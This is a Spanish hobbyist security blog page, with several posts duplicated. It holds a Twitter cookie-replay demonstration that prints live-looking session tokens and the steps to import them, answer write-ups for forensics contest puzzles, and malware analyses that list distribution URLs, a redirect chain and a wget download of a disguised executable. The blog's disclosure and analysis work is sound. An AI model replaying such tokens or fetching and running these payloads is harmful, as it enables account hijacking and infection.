Como explican los chicos de Securitybydefault en http://www.securitybydefault.com/2010/09/twitter-y-las-galletas-caducadas.html , twitter no está destruyendo realmente las cookies (ni siquiera aunque uno cierre sesión como dios manda xD) o al menos no en un tiempo razonable.
Esto qué quiere decir? quiere decir que se pueden reutilizar las cookies para continuar una sesión que fue abierta con las de la ley (con usuario y password correctos). De esta forma, quien se haga con nuestras cookies es capaz de utilizar nuestra cuenta.
Inconvenientes:
-Una vez obtenida la cookie el usuario malvado podría eliminar todos nuestros followers, agregar nuevos, insultar a mamá y papá, decirle a la novia que no la querés ver mas xD (podría no ser tan malvado), etc etc etc.
Algo bueno?:
-emm... digamos que si. Este usuario poseído, no podrá hacer cambios irreversibles como cambiar la contraseña o el mail asignado a nuestra cuenta, porque para ello debería conocer nuestra contraseña y estamos suponiendo que tenemos una contraseña segura y que no tiene relación alguna con el nombre de la cuenta ni el mail, ni nada tan predecible.
Realmente funciona? SISI, hace mas de 2hs cree una cuenta en twitter (luego de haber probado con mi cuenta privada) y aún se puede entrar utilizando las cookies.
Las cookies son las 12 siguientes:
.twitter.com TRUE / FALSE 1285196450 __utmb 43838368.10.10.1285194542
.twitter.com TRUE / FALSE 1348266650 __utmv 43838368.lang%3A%20es
.twitter.com TRUE / FALSE 0 __utmc 43838368
.twitter.com TRUE / FALSE 1348266650 __utma 43838368.1707552852.1285194542.1285194542.1285194542.1
.twitter.com TRUE / FALSE 0 _twitter_sess BAh7DzoVaW5fbmV3X3VzZXJfZmxvdzAiLXNob3dfZGlzY292ZXJhYmlsaXR5%250AX2Zvcl9zb3l1bmFwcnVlYmFtYXMwOhNwYXNzd29yZF90b2tlbiItMmRhMjM3%250AZTA5NTdjYmE0NjJhNDQ1YjE4Nzg1NDE0NTgzYmQ4NDBlMjoMdHpfbmFtZSIN%250AQnJhc2lsaWE6CXVzZXJpBMNcjgs6E3Nob3dfaGVscF9saW5rMDoHaWQiJTUy%250AYjY0YTg2ODZmZjM2ZWU1NTIyYWIwZjhiNzNlYjY5IgpmbGFzaElDOidBY3Rp%250Ab25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOgxj%250Ac3JmX2lkIiVjNzA1MjRiNjZlODFkOGE2ZWQ3MTI2NGRmOTVhN2QyNDoPY3Jl%250AYXRlZF9hdGwrCGomkDsrAQ%253D%253D--91b23fa140937e74c8499f08229b4484cc3d73c3
.twitter.com TRUE / FALSE 0 auth_token 2da237e0957cba462a445b18785414583bd840e2
.twitter.com TRUE / FALSE 1300962542 __utmz 43838368.1285194542.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
.twitter.com TRUE / FALSE 1285799324 k 190.230.174.206.1285194524262928
twitter.com FALSE / FALSE 0 lang es
twitter.com FALSE / FALSE 0 tz_offset_sec -10800
twitter.com FALSE / FALSE 0 original_referer 4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl
twitter.com FALSE / FALSE 1287786524 guest_id 128519452426515090
Para realizar la prueba es necesario copias las cookies anteriores a un archivo e importarlas a nuestro browser preferido (entiendase FIREFOX) mediante algún plugin como ser "Add N Edit Cookies", una vez importadas vamos a www.twitter.com y magia!! :P somos "soyunapruebamas".
Podemos ver las cookies importadas:
Las cookies _twitter_sess, __utmc, auth_token, lang, original_referer y tz_offset_sec expiran (teóricamente) al finalizar la sesión, pero claramente NO lo están haciendo.
__utmb expira: 09/22/2010 21:24:32.
__utmv expira: 09/21/2012 20:54:32
__utma expira: 09/21/2012 20:54:32
k expira: 09/29/2010 19:28:44
__utmz expira: 03/24/2011 07:29:02
guest_id expira: 10/22/2010 19:28:44
A las 21:15 del 22 de septiembre de 2010, habiendo expirado casi todas las cookies, aún es posible utilizarlas...
La misma prueba hecha en facebook nos demuestra el funcionamiento esperado de las cookies:
-Si no cerramos sesión, las cookies se pueden reutilizar.
-Si cerramos sesión, las cookies se invalidan y es necesario volver a autenticarse.
Esto a simple vista podría no parecer peligroso, pero sumado a la aparición de un bug XSS en twitter, es posible que nuestras cookies sean robadas y ya no podríamos invalidarlas cerrando la sesión.
Aca un poco mas sobre una de las cookies auth_token: http://domdingelom.blogspot.com/2008/12/all-your-twitter-are-belong-to-us.html .
Aca un poco mas sobre el bug XSS: http://www.rtve.es/noticias/20100921/twitter-sufre-mayor-ataque-su-historia-culpa-fallo-seguridad/355656.shtml .
Importen las cookies, prueben y no hagan destrozos a "soyunapruebamas", gracias xD.
Archivo cookiest.txt http://www.megaupload.com/?d=1JX7UNZJ .
Hash MD5: 973b5eff003532bb2f4508cfcd9c9f93 cookies.txt
miércoles, 22 de septiembre de 2010
jueves, 2 de septiembre de 2010
Segundo desafío :P
Así es, esta entrada es para el segundo desafío (continuación del anterior, al menos en la historia xD). La facultad y la pasantía ciertamente me están desgastando el cuerpo, hoy me dormí un par de veces en la clase de inteligencia artificial, pero debo admitir que el profesor no ayudaba xD. Pero esto no es un diario xD, así que a lo que nos truje.
El segundo desafío es: http://forensicscontest.com/2009/10/10/puzzle-2-ann-skips-bail . Esta vez nos encontramos con un desafío un tanto mas interesante y un archivo de capturas un poco mas grande también.
Una vez comprendida bien las preguntas me dispuse a abrir el archivo de captura para buscar las respuesta, claramente usando wireshark :P.
RESPONDIENDO LAS PREGUNTAS:
1-Viendo un poco la captura encontramos en el paquete número 53 el inicio de una conexión tcp al puerto 587, que no es el puerto estandard de los servidores de correo (25), pero si seguimos la conexión queda en evidencia de que se trata de una conexión a un servidor de correo.
En la imagen se ve prácticamente toda la conexión con el servidor de correo y como se trata de stmp básico vemos todo en texto claro nada de cifrado.
Desde esta imagen podemos responder varias preguntas, vemos que el mail de la señorita "Ann Dercover" es "sneakyg33@aol.com".
2-Los dos puntos negros en la imagen anterior marcan la autenticación llevada a cabo, parece texto sin sentido, esto se debe a que el nombre del usuario (primero punto) y el password (segundo punto) están codificados en Base64 (para mas información http://es.wikipedia.org/wiki/Base64). Ahora pasemos a decodificar (nótese la diferencia entre codificar y cifrar, son cosas totálmente diferentes, base64 es un tipo de codificación no de cifrado).
Para decodificar los campos los extraemos manualmente y los decodificamos con el programa base64 de la siguiente manera:
Primero metemos las cuatro cadenas codificadas dentro de un archivo de texto para automatizar un poco todo (no se justifica para tan pocos datos codificados, pero buee), y luego procesamos una a una cada linea del archivo de la siguiente manera:
Y magia xD, el usuario de Ann Dercover es el que indicamos anteriormente y su password es "558r00lz".
3-En primer momento creí que la respuesta a esta pregunta también se podría sacar de la primer imagen, y me arriesgué a creer que el mail del señor X es "sec558@gmail.com". Pero no!, viendo la pregunta 4 me encontré con un segundo mail enviado por Ann, comenzando en el paquete 153. Esta vez el mail va dirigido a una dirección un tanto sospechosa xD "mistersecretx@aol.com", la cual sin lugar a dudas es la dirección del señor X.
4-En este segundo mail Ann escribe al señor X:
Ann pide al señor X que traiga su pasaporte falso y traje de baño :P.
5-Parte del texto del mail de Ann nos indica que la dirección de encuentro está adjunta al correo electrónico. Vemos que de hecho hay un archivo adjunto, con el nombre "secretrendezvous.docx", codificado en "base64".
6- Bien, esta parte es mas divertida, ahora hay que extraer el archivo codificado en base64, decodificarlo y calcular su hash md5.
Copiamos toda la parte codificada en base64 en un archivo, lo copié directamente desde wireshark seleccionando toda la parte codificada. Una vez listo el archivo lo decodificamos de la siguiente forma:
La opción "i" indica a base64 que ignore los caracteres no válidos que encuentre, sin la opción activada nos informará que se encontraron caracteres inválidos, por la forma en que los paquetes llegaron y como los muestra wireshark. Una vez que tenemos el archivo nos fijamos su estructura y file nos informa correctamente el tipo de archivo según su magic number. Con md5sum calculamos el checksum del archivo en cuestión "9e423e11db88f01bbff81172839e1923 secretrendezvous.docx".
7-Ahora, una vez mas, por no tener Microsoft Office y porque mi OpenOffice no es demasiado amigable con los .docx abro el archivo desde google:
El punto de encuentro se indica en la imagen, Avenida Constituyentes 1 Calle 10 x la 5ta Avenida, Playa del carmen México.
8-Descargamos la imagen (botón derecho guardar imagen, god bless google!) y vemos que se trata de un png, luego calculamos su checksum.
Y ahí quedan todas las preguntas respondidas :D.
Bueno, ahora voy a cumplir con mi cuerpo y me voy a dormir xD.
El segundo desafío es: http://forensicscontest.com/2009/10/10/puzzle-2-ann-skips-bail . Esta vez nos encontramos con un desafío un tanto mas interesante y un archivo de capturas un poco mas grande también.
Una vez comprendida bien las preguntas me dispuse a abrir el archivo de captura para buscar las respuesta, claramente usando wireshark :P.
RESPONDIENDO LAS PREGUNTAS:
1-Viendo un poco la captura encontramos en el paquete número 53 el inicio de una conexión tcp al puerto 587, que no es el puerto estandard de los servidores de correo (25), pero si seguimos la conexión queda en evidencia de que se trata de una conexión a un servidor de correo.
En la imagen se ve prácticamente toda la conexión con el servidor de correo y como se trata de stmp básico vemos todo en texto claro nada de cifrado.
Desde esta imagen podemos responder varias preguntas, vemos que el mail de la señorita "Ann Dercover" es "sneakyg33@aol.com".
2-Los dos puntos negros en la imagen anterior marcan la autenticación llevada a cabo, parece texto sin sentido, esto se debe a que el nombre del usuario (primero punto) y el password (segundo punto) están codificados en Base64 (para mas información http://es.wikipedia.org/wiki/Base64). Ahora pasemos a decodificar (nótese la diferencia entre codificar y cifrar, son cosas totálmente diferentes, base64 es un tipo de codificación no de cifrado).
Para decodificar los campos los extraemos manualmente y los decodificamos con el programa base64 de la siguiente manera:
Primero metemos las cuatro cadenas codificadas dentro de un archivo de texto para automatizar un poco todo (no se justifica para tan pocos datos codificados, pero buee), y luego procesamos una a una cada linea del archivo de la siguiente manera:
Y magia xD, el usuario de Ann Dercover es el que indicamos anteriormente y su password es "558r00lz".
3-En primer momento creí que la respuesta a esta pregunta también se podría sacar de la primer imagen, y me arriesgué a creer que el mail del señor X es "sec558@gmail.com". Pero no!, viendo la pregunta 4 me encontré con un segundo mail enviado por Ann, comenzando en el paquete 153. Esta vez el mail va dirigido a una dirección un tanto sospechosa xD "mistersecretx@aol.com", la cual sin lugar a dudas es la dirección del señor X.
4-En este segundo mail Ann escribe al señor X:
Ann pide al señor X que traiga su pasaporte falso y traje de baño :P.
5-Parte del texto del mail de Ann nos indica que la dirección de encuentro está adjunta al correo electrónico. Vemos que de hecho hay un archivo adjunto, con el nombre "secretrendezvous.docx", codificado en "base64".
6- Bien, esta parte es mas divertida, ahora hay que extraer el archivo codificado en base64, decodificarlo y calcular su hash md5.
Copiamos toda la parte codificada en base64 en un archivo, lo copié directamente desde wireshark seleccionando toda la parte codificada. Una vez listo el archivo lo decodificamos de la siguiente forma:
La opción "i" indica a base64 que ignore los caracteres no válidos que encuentre, sin la opción activada nos informará que se encontraron caracteres inválidos, por la forma en que los paquetes llegaron y como los muestra wireshark. Una vez que tenemos el archivo nos fijamos su estructura y file nos informa correctamente el tipo de archivo según su magic number. Con md5sum calculamos el checksum del archivo en cuestión "9e423e11db88f01bbff81172839e1923 secretrendezvous.docx".
7-Ahora, una vez mas, por no tener Microsoft Office y porque mi OpenOffice no es demasiado amigable con los .docx abro el archivo desde google:
El punto de encuentro se indica en la imagen, Avenida Constituyentes 1 Calle 10 x la 5ta Avenida, Playa del carmen México.
8-Descargamos la imagen (botón derecho guardar imagen, god bless google!) y vemos que se trata de un png, luego calculamos su checksum.
Y ahí quedan todas las preguntas respondidas :D.
Bueno, ahora voy a cumplir con mi cuerpo y me voy a dormir xD.
lunes, 30 de agosto de 2010
Primer desafío :D.
Bueno, como comenté en una de las entradas anteriores, cada vez que tenga un poco de tiempo libre (y me acuerde del blog xD) voy a intentar hacer desafíos de esos que dan vueltas por internet. La idea es empezar con los simples e ir subiendo un poco la dificultad y ver hasta donde puedo llegar xD. Principalmente buscaré desafíos de tipo forenses, al menos por ahora es lo que mas me interesa.
Para empezar elegí (http://forensicscontest.com/2009/09/25/puzzle-1-anns-bad-aim) este primer caso. La introducción está en inglés, y no pienso traducirla D... aprender inglés es muy importante, al menos en este rubro.
El desafío consiste básicamente en analizar una captura de tráfico de una LAN y responder las siguientes preguntas que se plantean.
Para poder ver el tráfico de manera legible utilizamos Wireshark, y nos encontramos con unos 240 paquetes, que van de consultas dns, actualizaciones NTP, paquetes ARP hasta conexiones http ssl tls, etc etc.
Reconocimiento de la red:
Desde la captura obtenida encontramos al menos 6 ordenadores en la red 192.168.1.0/24. Tenemos pcs en las direcciones 10,30,2,157,158,159 (último octeto de la IP real). Un servidor DNS en 10.1.1.20, un gateway y servidor NTP en 192.168.1.10, y un aparente servidor web en 192.168.1.157. Además encontramos algunas IPs públicas de servicios de mensajería instantánea AOL.
La primer secuencia de paquetes interesantes para este caso es la que tiene como origen 192.168.1.158 (pc de anna xD) y destino 64.12.24.50. En esta conexión podemos ver la conversación que mantiene Anna con el chico malo. El chico malo (192.168.1.159) está utilizando un cliente de mensajería que cifra la conversación, no así anna, por eso podemos ver la conversación en gran parte.
Bien, ahora podemos responder la primer pregunta.
1-El amigo malvado de anna se hace llamar "Sec558user1".
2-El primer comentario registrado fue escrito por anna y dice "Here's the secret recipe... I just downloaded it...".
3-También observamos el nombre de un archivo potencialmente de texto "recipe.docx", una vez que el destinatario acepta la transferencia del archivo, se abre una conexión punto a punto entre las dos pcs 192.168.1.158 <-> 192.168.1.159.
4-Buscando un poco por internet se pueden encontrar sitios que listan magic numbers (http://www.garykessler.net/library/file_sigs.html) para distintos tipos de archivos. El magic number que señala archivos de tipo docx es "50 4B 03 04", que si, es exáctamente igual al de archivos de tipo zip.
5-Este punto resultó ser bastante mas complicado que los anteriores xD.
La siguiente imagen es la captura de la conexión TCP que se abre para transferir el archivo recipe.docx. Los puntos rojos señalan los paquetes que traen carga efectiva (partes del archivo).
Desde otro punto de vista vemos:
"PK" es la traducción ASCII de "50 4B", es decir, a partir de allí existe nuestro archivo. Si pasamos el volcado a Hexa es mas claro:
Ahora viene el trabajo pesado. Como el archivo no es tan grande como para que sea necesario automatizar el proceso, lo hice manualmente. De cada uno de los paquetes marcados con rojo en la imagen de la conexión TCP extraje los bytes de carga, de la siguiente manera: seleccionamos el paquete, vamos a la zona de datos y exportamos los bytes del paquete.
Exportamos uno a uno los 10 paquetes, en mi caso les asigné como nombre las primeras 10 letras del abecedario, es decir a,b,c,d,e,f,g,h,i, y j. Ahora tenemos nuestro documento de texto partido en 10 pedazos xD, poco útil cierto? jajaj. Haciendo uso de una de las maravillas de la ingeniería unimos estos 10 archivos en uno solo, de la siguiente manera:
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ cat a b c d e f g h i j > recipe.docx
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ md5sum recipe.docx 8350582774e1d4dbe1d61d64c89e0ea1 recipe.docx
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ file recipe.docx
recipe.docx: Zip archive data, at least v2.0 to extract
Si!, cat es la maravilla de la ingeniería xD. Unidos los 10 archivos calculamos su checksum y de paso vemos como file lo detecta correctamente como un archivo tipo ZIP. Y ya tenemos el punto 5.
6-Si el punto 5 está bien hecho este es trivial, claro si tenés office instalado!!! :P, pero como no lo tengo recurrimos a GoogleDocs :D y leemos la receta secreta!!!
Y aca concluye el primer desafío. Anna realmente fue parte de una fuga de información y debería ser sancionada como corresponda :P. Sec558user1 se salió con la suya, obtuvo la codiciosa receta secreta y debe estar vendiéndola en ebay xD.
Para empezar elegí (http://forensicscontest.com/2009/09/25/puzzle-1-anns-bad-aim) este primer caso. La introducción está en inglés, y no pienso traducirla D... aprender inglés es muy importante, al menos en este rubro.
El desafío consiste básicamente en analizar una captura de tráfico de una LAN y responder las siguientes preguntas que se plantean.
Para poder ver el tráfico de manera legible utilizamos Wireshark, y nos encontramos con unos 240 paquetes, que van de consultas dns, actualizaciones NTP, paquetes ARP hasta conexiones http ssl tls, etc etc.
Reconocimiento de la red:
Desde la captura obtenida encontramos al menos 6 ordenadores en la red 192.168.1.0/24. Tenemos pcs en las direcciones 10,30,2,157,158,159 (último octeto de la IP real). Un servidor DNS en 10.1.1.20, un gateway y servidor NTP en 192.168.1.10, y un aparente servidor web en 192.168.1.157. Además encontramos algunas IPs públicas de servicios de mensajería instantánea AOL.
La primer secuencia de paquetes interesantes para este caso es la que tiene como origen 192.168.1.158 (pc de anna xD) y destino 64.12.24.50. En esta conexión podemos ver la conversación que mantiene Anna con el chico malo. El chico malo (192.168.1.159) está utilizando un cliente de mensajería que cifra la conversación, no así anna, por eso podemos ver la conversación en gran parte.
Bien, ahora podemos responder la primer pregunta.
1-El amigo malvado de anna se hace llamar "Sec558user1".
2-El primer comentario registrado fue escrito por anna y dice "Here's the secret recipe... I just downloaded it...".
3-También observamos el nombre de un archivo potencialmente de texto "recipe.docx", una vez que el destinatario acepta la transferencia del archivo, se abre una conexión punto a punto entre las dos pcs 192.168.1.158 <-> 192.168.1.159.
4-Buscando un poco por internet se pueden encontrar sitios que listan magic numbers (http://www.garykessler.net/library/file_sigs.html) para distintos tipos de archivos. El magic number que señala archivos de tipo docx es "50 4B 03 04", que si, es exáctamente igual al de archivos de tipo zip.
5-Este punto resultó ser bastante mas complicado que los anteriores xD.
La siguiente imagen es la captura de la conexión TCP que se abre para transferir el archivo recipe.docx. Los puntos rojos señalan los paquetes que traen carga efectiva (partes del archivo).
Desde otro punto de vista vemos:
"PK" es la traducción ASCII de "50 4B", es decir, a partir de allí existe nuestro archivo. Si pasamos el volcado a Hexa es mas claro:
Ahora viene el trabajo pesado. Como el archivo no es tan grande como para que sea necesario automatizar el proceso, lo hice manualmente. De cada uno de los paquetes marcados con rojo en la imagen de la conexión TCP extraje los bytes de carga, de la siguiente manera: seleccionamos el paquete, vamos a la zona de datos y exportamos los bytes del paquete.
Exportamos uno a uno los 10 paquetes, en mi caso les asigné como nombre las primeras 10 letras del abecedario, es decir a,b,c,d,e,f,g,h,i, y j. Ahora tenemos nuestro documento de texto partido en 10 pedazos xD, poco útil cierto? jajaj. Haciendo uso de una de las maravillas de la ingeniería unimos estos 10 archivos en uno solo, de la siguiente manera:
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ cat a b c d e f g h i j > recipe.docx
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ md5sum recipe.docx 8350582774e1d4dbe1d61d64c89e0ea1 recipe.docx
juan@moon:~/ForensicTests/puzzle1-forensicscontest/Solucion$ file recipe.docx
recipe.docx: Zip archive data, at least v2.0 to extract
Si!, cat es la maravilla de la ingeniería xD. Unidos los 10 archivos calculamos su checksum y de paso vemos como file lo detecta correctamente como un archivo tipo ZIP. Y ya tenemos el punto 5.
6-Si el punto 5 está bien hecho este es trivial, claro si tenés office instalado!!! :P, pero como no lo tengo recurrimos a GoogleDocs :D y leemos la receta secreta!!!
Y aca concluye el primer desafío. Anna realmente fue parte de una fuga de información y debería ser sancionada como corresponda :P. Sec558user1 se salió con la suya, obtuvo la codiciosa receta secreta y debe estar vendiéndola en ebay xD.
miércoles, 25 de agosto de 2010
Recien salido del horno "Que absurdo."
Aca traigo una novedad de esas que me llegan por mail xD. Esta vez de un contacto diferente, y con el siguiente texto:
Todos los enlaces de las supuestas fotos apuntan a http://mulhersubita.100webspace.ne t/ que nos redirije a un sito chino, específicamente a http://www.cwts.com.cn/en/area/taiwan/Downloads_E.z ip . Una vez descargado este archivo comprimido quien no se sentiría tentado de ver unas fotos... En fín, dichi zip contiene un ejecutable, que a este momento es detectado por 4 de los 42 antivirus que utiliza virus total, es decir, es muy muy nueno evidentemente. Enlace de mi reporte en virus total: http://www.virustotal.com/file-scan/report.html?id=77df88abc1a50a6d1b2b283388e1d1561f91e2b78becb870d1555d3b57cfbffb-1282783946 .
Una vez prepara la vm nueva voy a probar qué hace este nuevo bichito :D.
...
...
5 minutos después... una gran decepción, por algún motivo obtengo esto:
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Downloads_E.exe
process: terminated C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Downloads_E.exe
Es decir, el proceso se crea y muere inmediatamente... es probable que el entorno donde lo intento ejecutar no le sea propicio (Windows XP SP3).
Aca el reporte de anubis: http://anubis.iseclab.org/?action=result&task_id=13f3d7a196e03ed6459da776ce3d9e114&format=pdf .
Las actividades que registró anubis yo no las observé en mi entorno de pruebas, para esto debe haber una explicación, mis conjeturas son:
-Anubis realiza las pruebas sobre otro sistema operativo distinto del mio.
-Mi programa de logging de actividades CaptureBAT no registra las actividades de este malware, posiblemente sea mas avanzado que los demás.
Hasta el momento no registré actividad de red extraña desde la VM infectada, lo que me llama poderosamente la atención. No pude avisar a los administradores del sitio chino porque... no encontré un mail de contacto xD. El sitio tiene mucho código en php en malas condiciones y vulnerable, seguramente por ahí fue que lograron colarse los chicos malos.
En los próximos días tengo planeado hacer unos ejercicios de informática forense que iré juntando por la web, es una rama de la informática muy interesante. La idea es intentar resolverlos y subir los resultados al blog, como para variar un poco.
Todos los enlaces de las supuestas fotos apuntan a http://mulhersubita.100webspace.ne t/ que nos redirije a un sito chino, específicamente a http://www.cwts.com.cn/en/area/taiwan/Downloads_E.z ip . Una vez descargado este archivo comprimido quien no se sentiría tentado de ver unas fotos... En fín, dichi zip contiene un ejecutable, que a este momento es detectado por 4 de los 42 antivirus que utiliza virus total, es decir, es muy muy nueno evidentemente. Enlace de mi reporte en virus total: http://www.virustotal.com/file-scan/report.html?id=77df88abc1a50a6d1b2b283388e1d1561f91e2b78becb870d1555d3b57cfbffb-1282783946 .
Una vez prepara la vm nueva voy a probar qué hace este nuevo bichito :D.
...
...
5 minutos después... una gran decepción, por algún motivo obtengo esto:
process: created C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Downloads_E.exe
process: terminated C:\WINDOWS\explorer.exe -> C:\Documents and Settings\Administrador\Escritorio\Downloads_E.exe
Es decir, el proceso se crea y muere inmediatamente... es probable que el entorno donde lo intento ejecutar no le sea propicio (Windows XP SP3).
Aca el reporte de anubis: http://anubis.iseclab.org/?action=result&task_id=13f3d7a196e03ed6459da776ce3d9e114&format=pdf .
Las actividades que registró anubis yo no las observé en mi entorno de pruebas, para esto debe haber una explicación, mis conjeturas son:
-Anubis realiza las pruebas sobre otro sistema operativo distinto del mio.
-Mi programa de logging de actividades CaptureBAT no registra las actividades de este malware, posiblemente sea mas avanzado que los demás.
Hasta el momento no registré actividad de red extraña desde la VM infectada, lo que me llama poderosamente la atención. No pude avisar a los administradores del sitio chino porque... no encontré un mail de contacto xD. El sitio tiene mucho código en php en malas condiciones y vulnerable, seguramente por ahí fue que lograron colarse los chicos malos.
En los próximos días tengo planeado hacer unos ejercicios de informática forense que iré juntando por la web, es una rama de la informática muy interesante. La idea es intentar resolverlos y subir los resultados al blog, como para variar un poco.
lunes, 23 de agosto de 2010
Nuevo: "Fotos chocantes cobra engole garoto de 13 anos no Pantanal 09/08/2010"
Ya no se cuanto tiempo pasó de la entrada anterior, pero mas de una semana seguro. Necesito temas para escribir en el blog xD. Justamente hoy, recibí un nuevo email de mi "contacto en el mas allá". Nuevamente el título del email juega con el morbo de los seres humanos xD. Las supuestas fotos estarían enhttp://ofuxico.terra.com.br/materia/Fotos-pantanal-0.73642, que a decir verdad apunta a http://centurionet2001.com/files/ Fotos-IML-matogrosso.pps?0.73642 .
De una vez por todas estos chicos realizaron cambios interesantes, respecto a las versiones anteriores. Todo indica que centurionet2001.com, es un host comprometido por los chicos malos, o nunca fue concebido con buenos fines :P.
Si presionamos el link seremos redireccionados de la siguiente manera:
GET /files/Fotos-IML-matogrosso.pps?0.73642 HTTP/1.1
Host: centurionet2001.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 302 Moved Temporarily
Date: Mon, 23 Aug 2010 23:13:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Location: http://hostgaitor.narod.ru/materia.htm
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
De nuevo dominios .ru ... hostigaitor.narod.ru/materia.htm hospeda un sitio que se presenta de la siguiente manera.
Similar al sitio de adobe cierto? jajajaaj, no cabe duda. Además nos invita a instalar Adobe Flash Player version 10.1.6 (supuestamente) de Adobe System y hospedad en hostigator.narod.ru.
Pidiendo un poco mas de información a firefox vemos que el certificado con que fue firmada la aplicación:
Primero descargamos el archivo a instalar para comprobarlo con virustotal a ver que nos dice. El archivo en cuestión se hospeda en: http://realamizades.com/system/FLASH_PLAYER10.0.40.5.ex e.
Todo indica que este es el primer reporte que recibe virustotal de nuestro amigo infeccioso.
14 de 40 antivirus lo detectan como una amenaza, para ver el reporte total click aca -> http://www.virustotal.com/file-scan/compact.html?id=c116fc4d1aad19121d484c07ebad0d49cdc4e01a5778efc41e450bfe789bb803-1282606951#
Análisis de anubis: http://anubis.iseclab.org/?action=result&task_id=103db40d587163ab4cdfd8aaba20e6896&format=html . El reporte de anubis nos indica con precisión las actividades acometidas por nuestro .exe en el sistema.
Una de las primeras actividades es descargar la siguiente "imagen":
Se puede observar el sospechoso envión de una imagen en formato png, la cadena "This program must be run under win32" nos deja mas que claro que no se trata de una imagen en lo mas mínimo. Poniendo el link directamente en el navegador, este nos indica que la imagen está corrupta y no puede mostrarse. Para saber su verdadera identidad podemos utilizar por ejemplo el comando file (en linux) de la siguiente manera:
juan@moon:~$ wget http://lajeado2010.tv/log/itens_img01.png
--2010-08-23 21:17:52-- http://lajeado2010.tv/log/itens_img01.png
Resolviendo lajeado2010.tv... 189.38.80.195
Conectando a lajeado2010.tv|189.38.80.195|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 116992 (114K) [image/png]
Guardando a: «itens_img01.png.1»
100%[======================================>] 116.992 37,0K/s en 3,1s
2010-08-23 21:18:01 (37,0 KB/s) - «itens_img01.png.1» guardado [116992/116992]
juan@moon:~$ file itens_img01.png
itens_img01.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
juan@moon:~$
Ya no cabe duda de que no se trata de un png xD, sino de un archivo ejecutable de windows. Aca el análisis de virustotal de itens_img01.png http://www.virustotal.com/file-scan/report.html?id=f911b9f4a1801f480151d75466da7806d1efb2e842fffecff625aec1ab4fea10-1282609386.
De una vez por todas estos chicos realizaron cambios interesantes, respecto a las versiones anteriores. Todo indica que centurionet2001.com, es un host comprometido por los chicos malos, o nunca fue concebido con buenos fines :P.
Si presionamos el link seremos redireccionados de la siguiente manera:
GET /files/Fotos-IML-matogrosso.pps?0.73642 HTTP/1.1
Host: centurionet2001.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 302 Moved Temporarily
Date: Mon, 23 Aug 2010 23:13:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.9
Location: http://hostgaitor.narod.ru/materia.htm
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
De nuevo dominios .ru ... hostigaitor.narod.ru/materia.htm hospeda un sitio que se presenta de la siguiente manera.
Similar al sitio de adobe cierto? jajajaaj, no cabe duda. Además nos invita a instalar Adobe Flash Player version 10.1.6 (supuestamente) de Adobe System y hospedad en hostigator.narod.ru.
Pidiendo un poco mas de información a firefox vemos que el certificado con que fue firmada la aplicación:
- Expiró en 2009 (Validity Validity: [From: Sat Nov 08 18:25:37 ARST 2008,
To: Fri Feb 06 18:25:37 ARST 2009] ). - Fue generado por Adobe System@ para Adobe System@. Lo cual despierta sospechas a firefox.
Primero descargamos el archivo a instalar para comprobarlo con virustotal a ver que nos dice. El archivo en cuestión se hospeda en: http://realamizades.com/system/FLASH_PLAYER10.0.40.5.ex e.
Todo indica que este es el primer reporte que recibe virustotal de nuestro amigo infeccioso.
14 de 40 antivirus lo detectan como una amenaza, para ver el reporte total click aca -> http://www.virustotal.com/file-scan/compact.html?id=c116fc4d1aad19121d484c07ebad0d49cdc4e01a5778efc41e450bfe789bb803-1282606951#
Análisis de anubis: http://anubis.iseclab.org/?action=result&task_id=103db40d587163ab4cdfd8aaba20e6896&format=html . El reporte de anubis nos indica con precisión las actividades acometidas por nuestro .exe en el sistema.
Una de las primeras actividades es descargar la siguiente "imagen":
Se puede observar el sospechoso envión de una imagen en formato png, la cadena "This program must be run under win32" nos deja mas que claro que no se trata de una imagen en lo mas mínimo. Poniendo el link directamente en el navegador, este nos indica que la imagen está corrupta y no puede mostrarse. Para saber su verdadera identidad podemos utilizar por ejemplo el comando file (en linux) de la siguiente manera:
juan@moon:~$ wget http://lajeado2010.tv/log/itens_img01.png
--2010-08-23 21:17:52-- http://lajeado2010.tv/log/itens_img01.png
Resolviendo lajeado2010.tv... 189.38.80.195
